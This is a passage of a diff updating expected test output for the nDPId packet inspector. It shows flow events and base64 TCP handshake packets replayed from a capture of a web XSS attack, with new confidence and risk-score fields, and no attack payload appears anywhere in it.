+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347867086,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347867086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347867086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sxZAAD4GErqsEAABwKgKMoL2AFBvHeVWAAAAAKACchAvzQAAAgQFtAQCCAoBPFZAAAAAAAEDAwc="}
@@ -3053,17 +3053,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347874737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88wxAAD4G0sOsEAABwKgKMoNIAFDgx661AAAAAKACchDs+AAAAgQFtAQCCAoBPF25AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":2,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347874737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg0iSQssc4MeutqAScSBdZQAAAgQFtAQCCAoD5i8tATxduQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":3,"flow_last_seen":1499347874738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347874738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08w1AAD4G0sqsEAABwKgKMoNIAFDgx662kkLLHYAQAOX8bAAAAQEICgE8XbkD5i8t"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347875752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347877292,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347877292,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347877292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t4hAAD4GDkisEAABwKgKMoNiAFCEB9ewAAAAAKACchAeJQAAAgQFtAQCCAoBPGA4AAAAAAEDAwc="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":2,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347877292,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg2I\/o2nZhAfXsaAScSA\/9QAAAgQFtAQCCAoD5jGsATxgOAEDAwc="}
@@ -3084,15 +3084,15 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347883693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WYNAAD4GbE2sEAABwKgKMoOmAFDBWz\/7AAAAAKACchByAgAAAgQFtAQCCAoBPGZ4AAAAAAEDAwc="}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":2,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347883693,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg6YJ\/gJMwVs\/\/KAScSAqxQAAAgQFtAQCCAoD5jfsATxmeAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":3,"flow_last_seen":1499347883694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347883694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WYRAAD4GbFSsEAABwKgKMoOmAFDBWz\/8Cf4CTYAQAOXJzAAAAQEICgE8ZngD5jfs"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
